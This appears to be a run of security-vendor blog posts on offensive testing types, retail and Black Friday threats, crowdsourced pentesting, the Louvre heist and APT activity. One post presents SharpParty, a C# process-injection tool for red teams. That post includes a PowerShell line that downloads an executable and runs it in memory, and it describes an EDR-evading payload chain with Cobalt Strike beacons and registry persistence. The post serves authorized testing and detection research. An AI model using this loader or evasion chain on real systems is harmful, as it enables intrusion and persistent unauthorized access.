The merits of deploying offensive testing to strengthen an organization’s security posture are well-understood by today’s security leadership. Much to the relief of defenders, obtaining approval for an offensive security exercise has never been easier.

However, the process of selecting the most appropriate offensive testing solution requires untangling overlapping definitions and vaguely defined terminology that leaves security teams more confused than when they started.

How is an Adversary Emulation different from a Red Team? What about this new Breach and Attack Simulation (BAS) tool that has been receiving great publicity recently? Would it be simpler to just invest in a Penetration Test instead?

To help break all this down, we will provide a framework to understand the value proposition of different offensive security services from a defender’s perspective, focusing on the core assumptions underlying each solution’s methodology. We will also identify important factors that help with narrowing down which form of offensive testing is best suited for your organization. 

The Ends and The Means

To understand the differences between types of offensive testing, consider the following: 

• Are defenses being tested against attacks in general, or specific adversaries? Are offensive techniques being emulated for maximum realism, or simulated for rapid validation?

This framework allows us to classify offensive security services into four general categories.

	Attack	Adversary
Simulation	Breach and Attack Simulation (BAS)	TTP-Agnostic Red Teaming
Emulation	Penetration Testing	TTP-Driven Red Teaming

Although there is often methodological overlap between the four quadrants, this model can be used to make sense of industry terminology from a defender’s point of view by focusing on the how and the why of conducting offensive security testing.

To use a domestic analogy, let’s assume you want to ensure your home is safe from being broken into. The type of test you choose will dictate what you learn about your security posture.

• Breach and Attack Simulation (BAS) focuses on the repeatable execution of individual attacks, usually in an automated fashion, targeting specific defensive capabilities, much like trying the door handle every few hours to make sure the lock is engaged. Crucially, the focus is on ensuring that the lock’s status is validated, and not on the specific mechanics of how the handle was engaged.
• Penetration Testing, on the other hand, is a time-bound, scoped assessment targeting a specific goal, usually with the full awareness of the internal security team. This is like hiring a professional burglar to attempt breaking in within a set duration, but with certain limits - lock picking is okay, but smashing the window is out of bounds!
• Red Teaming, whether TTP-driven or not, is a comprehensive exercise that targets an organization similar to how a real-life adversary would, often with no warning provided to defenders. Continuing our analogy, this is similar to tasking professionals with breaking into your house from start to finish, like a real burglar, with few restrictions. In this situation, you may want to smash the window to see if the home security service you paid for is worth the money.

The Right Tool for the Job

When selecting an offensive security service, organizations should first ensure that foundational defensive controls are in place. Engaging a Red Team without having validated basic controls will surface findings that would likely also have been discovered with Penetration Testing.

• First, leverage BAS to identify gaps and misconfigurations and validate the functionality of security tools.
• Subsequently, conducting Penetration Tests on internal networks and web applications can unearth additional vulnerabilities and attack paths in custom software and business logic. 
• Finally, engaging in a Red Team will test defenders’ readiness to combat a targeted, real-world attack by a sophisticated adversary. The choice of whether a Red Team is TTP-agnostic or TTP-driven (Adversary Emulation vs Simulation) will depend on whether you are concerned about specific threat actors or groups and are interested in testing tailored defenses, such as detection rules for TTPs used to target your industry.

While it is tempting to jump directly to the “most realistic” form of security testing, this misconception results in limited value being obtained from an offensive security exercise. Adversaries will take the path of least resistance into an organization - before smashing the window, a burglar will pick your lock, but before that, they will certainly just try the handle.

• Black Friday Cyber Threats: As retail sales peak, cybercriminals ramp up attacks, targeting vulnerabilities in retail businesses during the holiday rush.
• Retailers Under Siege: In 2025, a significant number of retailers, including major brands, experienced increased cyberattacks, highlighting the urgent need for enhanced cybersecurity.
• Essential Security Measures: Implement comprehensive strategies such as employee training, securing POS systems, and adopting a Zero Trust Architecture to safeguard against emerging threats this Black Friday.

Black Friday is only days away, and despite many stores sneaking holiday decorations onto their shelves since mid-September, it marks the official start of the December shopping frenzy.

The coming days will not only bring a massive surge in sales, but also an equally large spike in cyber threats. For retailers of all sizes, this peak season is prime time for cybercriminals to exploit vulnerabilities. The 2025 LevelBlue Futures Report: Aligning Cyber Resilience and Business Goals in the Retail Sector highlights a critical disconnect: as attacks become more sophisticated, many retailers are confident yet underprepared.

The Threat Landscape: Why Black Friday Is a Target

Retail sector attacks in 2025 have been widespread and devastating, having caused severe operational issues even for prominent retailers like Harrods, Marks & Spencer, and Victoria’s Secret.

The continuing threat actor focus on retail, combined with the intense pressure of Black Friday, only amplifies the risk.

The positive takeaway from these attacks is that they are forcing the C-Suite to take notice of their cybersecurity posture, but a gap remains between awareness and defense capability.

• High Volume of Attacks: 44% of retail executives report experiencing a significantly higher volume of attacks than 12 months ago, with 34% having suffered a breach in the past year.
• AI-Powered Threats Loom: Organizations expect a rise in AI-powered attacks, deepfakes, and synthetic identity fraud in 2025. Worryingly, only 25% say they are prepared for AI-powered threats, even though 45% expect them.
• Overconfidence Is a Risk: 49% of executives feel highly competent at defending against AI adversaries, but this confidence can lead to complacency. Even confident teams can miss fast-evolving threat vectors without clear, organized oversight.

The data is clear: the threat is real, rapidly evolving, and is not slowing down for the holidays.

Six Critical Steps to Cyber Resilience for Black Friday

To protect your business and customers during the busiest shopping event of the year, you must integrate comprehensive cyber resilience into your immediate Black Friday preparation plan.

1. Prioritize Employee Training and Phishing Defense

Your staff is your first line of defense, especially against social engineering attacks, which are becoming more persuasive thanks to AI.

• Educate Staff on Phishing Scams: Ensure employees know how to recognize and report suspicious emails, links, or attachments, especially those involving payments or sensitive data. 63% of executives say it’s becoming more difficult for employees to identify real threats.
• In-Store Fraud Awareness: Train staff to spot physical credit card fraud. Look for poor-quality holograms/logos, irregular card embossing, tampered signature panels, and suspicious customer behavior (e.g., nervousness, rushing, insisting on multiple declined cards).
• Strong Authentication: Enforce the use of unique, complex passwords and Two-Factor Authentication (2FA) for all systems accessing sensitive information.

2. Secure Your Point-of-Sale (POS) and Payment Systems

POS systems are a primary target as they handle sensitive financial information.

• Keep Systems Updated: Regularly update all POS software and hardware with the latest security patches to close known vulnerabilities.
• Network Separation: Isolate your POS network from guest Wi-Fi and other operational networks using firewalls and anti-malware protection.
• Modern Payment Security: Adopt EMV chip readers and accept digital wallets (Apple Pay, Google Pay), which use tokenization to avoid sharing actual card information, significantly reducing fraud risk.
• Online Sales Authentication: For e-commerce, implement CAPTCHA to block bots and 3D Secure Authentication for credit card payments to verify the customer’s identity during checkout, reducing card-not-present fraud.

3. Strengthen Your Software Supply Chain

The holiday season often involves integrating new tools or working with more vendors. Retail organizations are underestimating the risks posed by their ecosystem.

• Increase Visibility: 47% of executives have very low to moderate visibility into their software supply chain. You must push for better insight.
• Vet Third-Party Vendors: Only 22% of retailers prioritize engaging with suppliers about their security credentials. Immediately vet all third-party apps and services used for e-commerce, payment processing, or customer management.
• Limit Access: Only grant vendors the minimal access they need. Immediately revoke access for any vendor or integration no longer in use.

4. Adopt a Proactive, Zero Trust Architecture

Move from a reactive to a proactive security posture. A Zero Trust Architecture (ZTA) is a foundational strategy for a multi-layered defense.

• Move to ZTA: ZTA helps identify suspicious behavior quickly by implementing the principle of “never trust, always verify.” While only 32% of retailers are making a significant investment in ZTA, it is a critical investment that provides additional layers of protection against unpredictable threats such as ransomware and sophisticated attacks.
• Invest in Resilience: Focus investments on Application security (66%) and Cyber-resilience processes across the business (65%) to get ahead of risks.
• External Support: 45% of retailers intend to work with threat intelligence providers in the next two years. Engage external specialists for training, incident response planning, and to help strengthen your defenses.

5. Safeguard Customer Data

The risk of a data breach is highest when transaction volume is high.

• Limit Collection: Only collect the customer information you absolutely need for the transaction.
• Encryption is Non-Negotiable: Use encryption to protect sensitive data both in transit and at rest. Ensure any stored customer information is securely encrypted and maintained in compliance with standards like PCI DSS.
• Regular Data Backups: Have an automated, tested, and secure data backup plan. Store backups in a separate, secure location (like cloud storage) disconnected from your main network to ensure you can recover quickly from a ransomware or data-loss event.

6. Push Cyber Resilience Up the Organization

For security measures to be effective during a crisis like a DDoS attack or a breach, they must be supported from the top down.

• Boardroom Engagement: Increase engagement among leadership so that cyber resilience is viewed as a core business function, not just an IT issue.
• Accountability: 51% of executives say leadership roles are measured against cybersecurity performance indicators—this needs to be an organization-wide mandate to foster a resilient culture.
• Alignment: Integrate security into business decisions from the beginning, including allocating a cybersecurity budget for new initiatives right from the start.

The Black Friday 2025 shopping season will test the resilience of every retailer. By leveraging insights from the LevelBlue Futures Report and implementing these protective measures, you can move past overconfidence and transform your cybersecurity into a competitive advantage, ensuring a secure and profitable holiday.

• CPT vs. Bounties: CPT is a time-boxed, structured test for compliance reports with a fixed cost. Bug Bounty is ongoing, open-ended discovery paid per valid vulnerability found.
• Mitigate Key Risks: Watch for poor researcher vetting, potential data exposure/exfiltration by bad actors, and labor misclassification risks from global contractor engagement.
• Selection Essentials: Demand rigorous identity verification, confirmed CREST certification for reports, and ethical procurement policies ensuring fair labor standards.

Crowdsourced penetration testing promises broad coverage, flexible resourcing, and cost efficiency by tapping into a distributed pool of security testers.

Trustwave, A LevelBlue Company, realizes not every organization has the financial resources to partner with a security firm with dedicated penetration testing capabilities. At the same time, we want to make organizations aware of the many pitfalls in the crowdsourced pen-testing market and offer a few pointers on choosing the right vendors.

While the benefits of crowdsourced penetration testing are real, so are the risks distinctive to this brand of testing. These can include fake testing agencies, tax implications, and even ethical procurement.

To get a better handle on how crowd-based services are delivered, let’s look at who’s doing the work, the data and operational risks to your organization, and practical controls you can use to make informed procurement and governance decisions.

Defining Crowdsourced Penetration Testing

The term itself is not well-known, but to make it easier, let’s think of it as a close cousin to a bug bounty program, but keep in mind that while the similarities are clear, the differences can be quite stark.

A bug bounty program is primarily focused on continuous vulnerability discovery and is designed to run indefinitely, or on an always-on basis, allowing for ongoing risk reduction. It typically has a broad and open-ended scope, often covering all public-facing assets. Because the hackers operate with a freestyle and unstructured methodology, the organization benefits from a large, diverse crowd of testers.

The financial model is pay-for-results, meaning the company only pays a bounty for valid, unique vulnerabilities that are found, which can make the total cost unpredictable. The main output is a running list of validated vulnerability reports and security metrics.

In contrast, crowdsourced penetration testing is geared towards a structured, time-boxed assessment to fulfill compliance needs or test a new feature. These engagements are time-bound, lasting for a specific period, and operate within a specific and controlled scope defined before the test begins.

The testers are a curated, smaller team of highly vetted experts who follow a structured and methodology-driven approach. This results in a comprehensive final report that is ideal for satisfying compliance requirements (like SOC 2 or PCI DSS). The cost is typically a fixed fee or a blended model, providing a more predictable budget.

A company should consider crowdsourced penetration testing when they are interested in rooting out lower-risk activities, or when conducting external testing where an organization is not letting the penetration tester in the door. Additionally, price plays a role. Crowdsourced penetration testing tends to be lower cost.

How Crowdsourced Penetration Services Are Delivered

In a similar manner to a bug bounty program, most crowdsourced testing is delivered through an intermediary platform that coordinates testers, scopes engagements, and aggregates results.

Platforms vary widely in how they operate: some are primarily marketplaces (connecting buyers to individual testers), others deliver managed programs (vetting, triage, reporting, and post-test remediation support.)

The key differences that affect your risk profile include:

• Whether the platform manages identity and vetting centrally or leaves it to buyers.
• How the platform handles disclosure, triage, and remediation workflows.
• The contractual relationship: direct hire of testers vs. contracting with a platform-as-a-service provider.

The Pros and Cons of Global vs Regional Resources

Using global testers increases scale and specialized skills (useful for niche technologies) but raises regulatory, legal, and supply-chain risks (export control, cross-border data flows, varying labor laws). Regional resources may offer stronger legal recourse, easier background checks, and cultural/contextual advantages — but smaller talent pools and potentially higher costs.

Who is doing the work — vetting and trust.

Vetting of resources

Not all testers are equal, and a proper vetting program is imperative not only to get good results but to protect your organization. Effective vetting should include:

• Identity verification (document checks, two-factor identification).
• Criminal / police checks where appropriate and lawful.
• Skills validation (certificates like CREST challenge tasks, past program history).
• Reputation metrics (platform ratings, peer endorsements, previously published research).

Ensuring the Testers Are Who They Say They Are

A major risk with open crowds is impersonation and false identities. Poor vetting can allow criminals or fraudsters to participate and gain entry to your systems. These can include letting state-sponsored or malicious actors who can use testing access as a cover.

Risk scenario: A bad actor passes a poorly designed and executed vetting process, is granted scoped access, and later exfiltrates data or establishes persistence under the guise of testing.

Potential Exploitation of Workers

Crowdsourced models can create labor risks that expose your organization not only to legal issues but also to moral ones.

• Taxation and superannuation exposure: Are workers engaged as contractors or employees? Misclassification risks can create liability for platforms or buyers.
• Modern slavery/worker protection: Some platforms may source testers from jurisdictions with poor labor protections; you should consider whether working conditions or coercive practices are involved.
• Ethical procurement: include clauses requiring platforms to adhere to labor standards and to supply transparency about their worker engagement model.

Security Operations Center (SOC) Complacency During Testing

One issue to be aware of is SOC complacency. If your SOC treats crowd testing as a controlled exercise, real adversarial activity may be ignored, or conversely, testers may be mistaken for adversaries. Either outcome reduces program value and increases risk.

Quality of Deliverables

Crowd testing results can range from one-line “bug bounty-like” reports to well-documented exploit chains with remediation advice. Ensure you specify the results you want at the end of testing in any contract.

There are three common problems to avoid when arranging tests:

• Duplicate or low-value findings (noise).
• Poorly reproducible or insufficiently documented issues.
• Overly generic remediation advice.

Pen Tester Skill Level

Crowdsourcing excels at breadth (many scanners and testers run tests concurrently), but not all platforms guarantee depth. If you need advanced adversary simulation, confirm the required skill level and provide a sample of past work.

Remember, there’s a difference between:

• Scripted vulnerability scanning (automated, low custom skill) and
• Specialized offensive security experts (manual exploitation, creative attack paths).

Obtaining the Best Results Possible

Peer-review or triage processes significantly improve output quality. Look for platforms that:

• Triage and validate submissions before delivery.
• Provide a peer-review or second-opinion mechanism for complex findings.
• Offer a managed remediation tracking process.

The key is not to treat the crowd as a black box: insist on strong vetting, clear contractual protections, technical controls that minimize exposure, and operational processes that preserve SOC effectiveness.

When you combine those controls with sensible scoping and human triage, crowd testing becomes a powerful discovery engine — and not an unmanaged risk.

In Summary

To mitigate your risk and provide the highest value to your organization, look to the track record of your proposed penetration testing supplier, including the following:

• The heritage of your supplier, are they committed to your security?
• Independent references, whilst organizations will have Non-Disclosure Agreements in place, most organizations should be able to facilitate a call with a customer prior to contract execution.
• Industry certifications, CREST being a great example, allowing you to be sure that the cybersecurity companies you engage to test and protect your systems are reputable and competent.
• Ask for redacted example reports that align with your required scope, and know the quality of what you will receive in advance.

Finally, if any of the points raised here give you pause, remember that Trustwave SpiderLabs has dedicated teams of pen testers with a long history of conducting highly effective tests that will improve your security.

• Cyber meets physical security: Weak passwords and outdated systems may have opened the door to the thieves.
• A warning for all industries: The Louvre incident shows why converging cybersecurity and physical security is essential.

In eight short minutes on October 25, 2025, a group of thieves captured the world’s attention and imagination, perpetuating a daring heist in broad daylight and escaping with approximately €88 million worth of prized artwork from the planet’s most visited museum: The Louvre.

Within the security community, the first successful robbery from the iconic Parisian landmark since 1998 was a bombshell story. But the “security community” is large and diverse, and very little of the public dialogue regarding the heist touched specifically upon cybersecurity.

These stolen masterpieces were not flush cryptocurrency wallets or valuable pieces of NFT art secreted away on a thumb drive or exfiltrated to a remote server, the thieves employed some of the oldest tools in the burglary game: a ladder for climbing and a sharp edge for cutting.

So far, law enforcement has arrested a total of seven people in connection with the heist, according to published reports.

What’s the Connection to Cyber?

While details about the security weaknesses that enabled the heist are still forthcoming, the mechanical lift and electrical angle grinder are not generally the tools of the cybercriminal.

As a result, the Louvre heist, at first glance, seemed largely distinct from the cybersecurity sphere, until additional details emerged regarding the museum’s cybersecurity controls.

Details from past audits revealed the museum’s security posture was fraught with vulnerabilities and security hygiene concerns. Of note, these security weaknesses pertained directly to the museum’s network of physical access control systems, including surveillance cameras secured with the much-ballyhooed password “LOUVRE.”

To understand how such rudimentary weaknesses could have persisted within such critical anti-theft infrastructure, we must consider the convergence of cyber and physical security.

Readers who have enjoyed Dan Brown’s The Da Vinci Code will be aware that the Louvre is equipped with a wide array of physical security systems, including deployable gates and mantraps that can be triggered during a burglary attempt. What may not be so obvious is the extent to which these modern physical security controls are supported by an information technology infrastructure.

As early as 2021, CISA warned of the Cybersecurity and Physical Security Convergence, calling out an “increasingly interconnected mesh of cyber-physical systems (CPS)”. Anyone who has badged into an office space has experienced this phenomenon, in which an IT-supported access control system affects a change in the physical world in the form of an unlocked door.

The problem, CISA continues in the same 2021 publication, is that the convergence of physical and cybersecurity teams has not kept pace with the expansion of CPS environments.

Seen as unique business functions with distinct responsibilities and skillsets, cyber and physical security groups have traditionally operated in siloes, often reporting to different members of executive leadership. As a result, organizations face increased risk that critical CPS technologies owned and operated within the physical security function are not managed with cyber resilience in mind.

Returning to the Louvre specifically, we see an organization whose physical security controls are at risk of being undermined by the unstable cyber foundation on which they operate.

Past cybersecurity audits demonstrate a spate of information security issues at the museum dating back to 2014, which prompted repeated warnings and improvement recommendations from the French National Cybersecurity Agency (ANSSI).

Among these findings are a few most egregious, including the aforementioned password selection and a reliance upon obsolete security software purchased in 2003 and running on the longtime end-of-life Windows Server 2003 operating system.

What We Know and What We Don’t Know, Yet

While we know about past cybersecurity issues, without the release of complete details from the ongoing Louvre investigation, it is impossible at this time to ascribe blame to the museum’s cybersecurity deficiencies.

However, at the very least we can identify several scenarios in which the security vulnerabilities identified in the ANSSI audit reports could feasibly enable or contribute to a successful heist.

Slick talking and elaborate costumes aside, Clooney and Co. cannot reach the fabled casino vault in Ocean’s Eleven without first compromising the integrity of security camera feeds.

Cyber compromise of camera systems limits their effectiveness and contributes to a physical security breach.

Given the eye-popping value assigned to the stolen art, the incident at the Louvre serves to illustrate the value of an integrated security program, in which CPS systems receive the maintenance required to stay resilient against physical and digital attacks.

This valuable lesson applies well outside the realm of grand larceny as well, as the proliferation of CPS technology could allow an attacker to manipulate medical devices or disable an electrical power grid. All organizations would do well to assess their CPS footprint and foster increased collaboration between Cyber and Physical security specialists.

By viewing physical security through a cyber lens, organizations can better understand how real-world vulnerabilities can lead to digital or physical compromise and impact. At LevelBlue, we help our clients bridge the gap between the digital and physical worlds by assessing how building access, surveillance, and employee processes can open or close doors to cyber and physical threats.

• The future of retail cybersecurity: Explore insights from 220 retail executives on managing AI-driven threats and closing the cyber resilience gap.
• 44% of retail organizations report a sharp increase in cyberattacks, underscoring the urgent need for stronger cybersecurity defenses across the sector.
• 34% of retailers experienced a data breach in the past year, revealing the persistent vulnerabilities in retail cybersecurity strategies.

The last year has seen the retail sector fixed squarely in the sights of threat actors, as several of the largest attacks involved several of the world’s best known retail brands, including Harrods, Marks & Spencer, and Victoria’s Secret.

The 2025 LevelBlue Futures Report: Aligning Cyber Resilience and Business Goals in the Retail Sector provides context for these attacks, with 44% saying they are experiencing a significantly higher volume of attacks and 34% of retailers surveyed noting that their organization in fact suffered a breach in the last year.

These figures are from a worldwide survey of 220 retail executives conducted by LevelBlue earlier this year. The intent was to uncover whether retail organizations are incorporating enterprise-level cyber resilience strategies and to determine their major cybersecurity concerns moving forward.

The survey revealed a roller coaster ride of answers with retailers expressing both confidence in their ability to repel certain types of attacks and concern over being unprepared for others.

The AI Conundrum

The survey made it clear that retail executives are concerned about and expect AI-powered attacks to take place. Showing an odd dichotomy, 49% of those surveyed said they are highly or very highly competent at defending themselves against AI-based attacks, but only 25% go on to say they are prepared to deal with such incidents.

Perhaps reflecting their possible overconfidence in their ability to defend against AI attacks, 52% replied that they are highly or very highly competent at implementing and using AI to enhance cybersecurity. The vast majority are so confident in their ability to implement AI-powered security that only 32% are reluctant to implement AI tools and technologies because of possible associated cybersecurity ramifications.

Alignment for Success

The need for cybersecurity teams to integrate with the organization's lines of business is starting to gain traction, with 44% of the surveyed saying they have effectively aligned business risk appetites with cybersecurity risk management. This is aided by the fact that 49% of the executives noted that communication channels between cybersecurity and line-of-business teams are effective.

This level of alignment falls off when it comes to implementing security measures with new projects, as only 37% allocate a cybersecurity budget to new initiatives from the beginning, which is significantly lower than the global average of 46%.

A Cybersecurity Culture Gap

It is well understood that creating an environment in which all workers understand they are an integral part of their firm’s cybersecurity architecture is essential to building a strong security culture. Unfortunately, the survey found only 40% say they have an effective company-wide cybersecurity culture.

One avenue to consider for improving this figure would be using outside expertise to enhance their workforce’s cybersecurity measures. However, only about one-third have engaged external support for training and awareness in the past 12 months, and this figure is not expected to change in the coming years.

These are just a few of the dozens of topics covered in the 2025 LevelBlue Futures Report: Aligning Cyber Resilience and Business Goals in the Retail Sector. The report offers a comprehensive look into how retailers are responding to escalating cyber threats. 

Download the full report to explore the complete survey data, insights, and recommendations shaping the future of retail cybersecurity.

Introduction

As Anti-Virus and EDR solutions improve in detection and response capabilities, the job of a red teamer can become quite arduous. Malware payloads and techniques that once dominated networks have failed the test of time as EDR becomes aware of them. If your initial access payloads are detected immediately, your six-week long red team could be dead on arrival. Additionally, real-world threat actors have an abundance of time and resources; just imagine all the payloads, techniques, and 0-days that a sophisticated threat actor group may have developed over the years. It is essential for red teams to continuously develop their tactics, techniques, and procedures (TTPs) for the purpose of emulating real-life threat actors that are ever evolving.

In this blog post, Stroz Friedberg, a LevelBlue company, introduces an addition to the red teamers’ toolkit called “SharpParty” – a C# implementation of the process injection techniques dubbed “PoolParty”.

We want to be very clear here: Stroz Friedberg did not create PoolParty nor did Stroz Friedberg extend the research into Windows Thread Pools. Rather, Stroz Friedberg simply translated the original source code of SafeBreach Labs from C++ to C#. The goal here is to give red teamers more options when picking their payloads. You can download SharpParty from our GitHub repository.

Process Injection

Before we dive into PoolParty, we must understand what process injection is first. Process injection is a relatively simple concept: inject code into another process. The purpose of injecting code into another process is to hide and obscure malicious activities. The actual implementation of process injection, however, is not as simple.

If you would like to learn more about process injection, please refer to the following URLs:

• https://attack.mitre.org/techniques/T1055/
• https://github.com/plackyhacker/Shellcode-Injection-Techniques 

Pool Party

SafeBreach Labs masterfully exemplified the necessity of continuous TTP development through the release of “PoolParty” – a suite of process injection techniques that target Windows Thread Pools. With this research, SafeBreach Labs was able to bypass five of the leading EDR vendors. They also released a Proof-of-Concept GitHub repository, with source code written in C++.

In short, PoolParty injects code into processes by crafting and inserting legitimate work items into a process’ thread pool. A work item is a structure that contains a task specification, including specific conditions and code to execute when these conditions are met. Injected work items effectively act as the execution primitive, because the work item will execute our code when its conditions are met. For example, a work item can perform an action when a file is modified. The file modification in this example is the execution primitive and we do not have to manually start the execution via something like “CreateRemoteThread”, which is a well-known indicator of process injection.

Motivation

The primary motivation for a C# implementation is to allow the Pool Party techniques to be used in tools that leverage inline MSBuild tasks in XML files. A Task XML file can include embedded C# code that, when passed to “msbuild.exe”, will be compiled and executed. While Task XMLs do support C++ (the language the original PoC was written in), they are only supported when the “CppCodeProvider.dll” assembly is present on the target machine. This DLL is included within some Visual Studio installations and is not guaranteed to be present on Windows machines by default. To ensure our payloads would detonate on practically any Windows host, we would need to implement the PoolParty technique in C#.

Additionally, a C# implementation of PoolParty can be reflectively loaded into memory via PowerShell:

$data = (new-object net.webclient).downloaddata('http://127.0.0.1/sharpparty.exe');
$assem = [System.Reflection.Assembly]::Load($data);
[SharpParty.Program]::Main("1 666".Split());


Lastly, as offensive C# tooling continues to grow in popularity, a C# PoolParty implementation can be integrated into other offensive tooling as part of varying attack chains.

For these reasons, Stroz Friedberg began implementation of the “PoolParty” technique in C# – SharpParty.

Efficacy Against EDR

During our testing, SharpParty was consistently able to bypass Microsoft Defender for Endpoint (MDE) initially. We submitted a report to Microsoft that demonstrated the bypass in March of 2025, which they validated and subsequently implemented detections for. Since then, we have observed an increase in the number of detections on SharpParty. Other EDR systems have detected and sometimes prevented the execution of SharpParty, largely based on the malicious use of “msbuild.exe” as well as an unspecified process injection technique.

While SharpParty inline tasks have seen increased detections from EDR recently, there are a few things worth noting:

• SafeBreach Labs publicly released their research on process injection via Windows Thread Pools, enabling EDR vendors to implement detections and monitoring for this technique.
• The use of inline tasks and “msbuild.exe” is a relatively well-known technique.
• There is room for further development that could improve the payload’s efficacy against EDR.

Ultimately our goal is to give red teams one more item in their toolkit, one more means to meet an end, another test case that evaluates threat detection capabilities.

Success Story

During our research, we had the opportunity to further test our code on a client engagement. The following is a breakdown of our payload:

• A Task XML file with C# inline task that contains encrypted SharpParty code and helper functions to fetch the decryption key, decrypt the code, then compile and execute the decrypted code.
• The beacon shellcode is nested within an additional layer of encryption.
• HTTP Keying is used to retrieve and validate the decryption key, ensuring connectivity to the C2 server.

The execution flow of the payload is depicted in the diagram below:

How the dropper executes “msbuild.exe” on the task XML is dependent on various conditions and is outside the scope of this blog post.

With everything tested and ready to go, we joined a call with the client to screenshare the malware detonation. We disguised the payload in such a way that, from the victim’s perspective, it looks like they downloaded a ZIP file and opened a PDF. Under the hood, we successfully executed SharpParty and obtained a Cobalt Strike beacon. After establishing the C2 channel, the client received no alarms on their side at that moment. After about 10 minutes, we suggested a test-case involving persistence via registry run keys to check if this activity is detected. The client agreed and we performed the test-case live on the call, setting an autorun key to execute the same SharpParty payload. Then, we logged out of the workstation, logged back in, and received the second beacon.

The client was understandably concerned, seeing as we had established two C2 beacons and they had not received any detections. 30 minutes after detonation, the EDR picked up the malicious use of “msbuild.exe” and an unspecified malicious payload in our target process, for which the client was alerted.

While ultimately this code was still caught, there are two key takeaways:

• The execution of “msbuild.exe” is what was picked up by EDR.
• There are 30 minutes between detonation and detection. While relatively small, this gap may be large enough for a threat actor to pivot within the network and maintain their access.

Conclusion

In summary, we have developed a C# implementation of PoolParty based on the incredible work from SafeBreach Labs, provided motivation for its existence, and shared a success story. As always, there is room for improvement. We have room to grow in terms of adding more variants, perhaps even discovering new ones, and improving the efficacy against EDR products. Our goal in publishing this blog post and open sourcing SharpParty is to share knowledge with the security community and provide avenues for future research and development.

• APT Groups prioritize Espionage and data theft: Approximately two-thirds of all Trustwave SpiderLabs-tracked APT group activity is motivated by espionage, targeting government, defense, and telecom sectors primarily in the US, Ukraine, and Russia.
• Top Attacker Nations: China (41%), Iran (12.5%), and Russia are the leading origins for espionage attacks, emphasizing the critical need for robust threat intelligence to track state-sponsored activity.
• Beyond Detection: Actionable Threat Intelligence: Trustwave SpiderLabs operationalizes threat intelligence by dissecting APT group Tactics, Techniques, and Procedures (TTPs) and converting them into custom detection rules to dramatically reduce attacker dwell time.

Government administration, defense, and finance sector organizations are the primary areas Advanced Persistent Threat (APT) groups are targeting, according to the most recent data from the Trustwave SpiderLabs’ Cyber Threat Intelligence (CTI) team.

The team found most attacks are launched from China, Russia, and Iran, with the primary targets residing in the US, Ukraine, and, interestingly, Russia. The groups tracked include Lapsus$, ShinyHunters, and Silk Typhoon.

Trustwave’s CTI list is not all-inclusive, but it offers a solid overview of the actors involved, where the attacks are launched from, and the nations undergoing the heaviest attack. SpiderLabs aggregates information continuously from a variety of APT databases maintained by the cybersecurity sector, along with internal reports.

Let’s start off with a quick reminder on APT groups and then look at what motivating factors are driving APT activity.

APT Defined

An Advanced Persistent Threat (APT) is a type of prolonged, targeted cyberattack in which an intruder gains unauthorized access to a network and remains undetected for an extended period, sometimes even months or years.

APT groups often use sophisticated toolsets and techniques, such as custom-developed malware, zero-day exploits, and multiple methods to evade traditional security defenses and gain access.

Persistence is maintained, as these attackers are not looking for a quick smash-and-grab strike but want long-term access to the network to continuously monitor activity and steal data over a sustained period. They will re-attempt access if initially blocked.

APT Group’s Motivating Factors

• Information Theft and Espionage – This activity accounts for about two-thirds of all SpiderLabs-tracked APT activity. Our analysts noted that China is responsible for about 41% of these attacks, followed by Iran, conducting 12.5%, and Russia, with 5%. These attacks focused on targets within the US, with Ukraine second most targeted, followed by the British Indian Ocean Territory and Russia. The targets most often hit were government/administration, defense, and telecoms.
• Financial – This category covers attackers looking for straight-up financial gain and those attempting crimes against financial institutions. This could include data theft, ransomware, etc. Again, the US was the most targeted nation, followed by Ukraine and Canada. SpiderLabs' insight into which nations housed the attackers is not as clear, with almost half not being known, but of those that are known, Russia is the leader, followed by China.
• Sabotage and Destruction – This James Bond-sounding category was the least likely to take place, with instances comprising less than 5% of all attacks. Russia led the way, conducting the most attacks, followed by Iran, striking with the US, Ukraine, Germany, and Israel being the most frequently struck. The most popular targets were the energy, government, defense, and finance sectors.

Victimology

SpiderLabs has also determined which specific vertical sectors are most often targeted.

The government sector, attacked primarily by China-based threat actors, was hit most often, with defense, finance, education, energy, and healthcare all on the receiving end of APT group activity. China, Iran, and Russia were often the home bases for those attacking these groups.

SpiderLabs' Direct Role in APT Defense

SpiderLabs not only tracks threats but also serves as the instrumental tool that helps Trustwave, A LevelBlue Company, protect its clients, including by defending against APT threats. The information derived for this report is based on the work SpiderLabs does in the field with our clients.

The protection offered by Trustwave against APTs is critically dependent on the continuous work of SpiderLabs, which operates across three key areas:

1. Elite Threat Intelligence & TTP Tracking
SpiderLabs analysts are dedicated to tracking and analyzing dozens of specific, sophisticated APT groups worldwide (e.g., APT34, APT44/Sandworm, Salt Typhoon, Silver Fox, and Scattered Spider).

• Dissection of TTPs: The team performs deep analysis on the Tactics, Techniques, and Procedures (TTPs), custom malware, and infrastructure used by these groups.
• Actionable Intelligence: This proprietary intelligence is immediately converted into custom detection rules and playbooks. These are infused directly into the Trustwave Fusion platform and the client's security tools (e.g., EDR/XDR/SIEM), enabling Trustwave's Security Operations Centers (SOCs) to detect subtle, behavioral anomalies that signature-based tools would miss.

2. Human-Led Advanced Threat Hunting
While automated security tools rely on known indicators, APTs specialize in stealth and avoiding detection (known as low-and-slow attacks). SpiderLabs' human expertise is used to find these hidden threats.

• Hypothesis-Driven Hunts: SpiderLabs experts use a hypothesis-based approach (assuming the client is already breached) to proactively search for indicators of compromise that align with known APT TTPs.
• MITRE ATT&CK Mapping: Their hunting methodology is mapped to the MITRE ATT&CK framework, allowing them to systematically search for activity across the entire attack chain—from initial access to persistence and command-and-control.
• Reduced Dwell Time: This proactive hunting significantly reduces the attacker's dwell time (the period an attacker remains in a network undetected,) minimizing the damage an APT can inflict.

3. Incident Response and Preparation
If an APT successfully breaches a client, SpiderLabs' forensic and response capabilities are activated immediately.

• Digital Forensics & Incident Response (DFIR): The team provides 24/7 global support for emergency breach response, performing forensic investigations to determine the scope, root cause, and identity of the APT actor.
• Containment and Eradication: They rapidly execute the steps needed to contain the threat and ensure the APT is completely eradicated from the environment.
• Offensive Security: SpiderLabs' ethical hackers also perform penetration testing and red team exercises that are informed by real-world APT TTPs. This tests a client's defenses against the most advanced adversaries, identifying security gaps before an actual APT exploits them.

SpiderLabs ensures that clients are not just protected against general threats, but are specifically fortified against the evolving, state-sponsored, and financially motivated groups that pose the greatest risk.

The worldwide ransomware landscape saw a dramatic shift in attacks in October 2025, jumping 41% month over month, with the most prolific attacker, Qlin, more than doubling the number of attacks it launched, according to Trustwave, A LevelBlue Company, research.

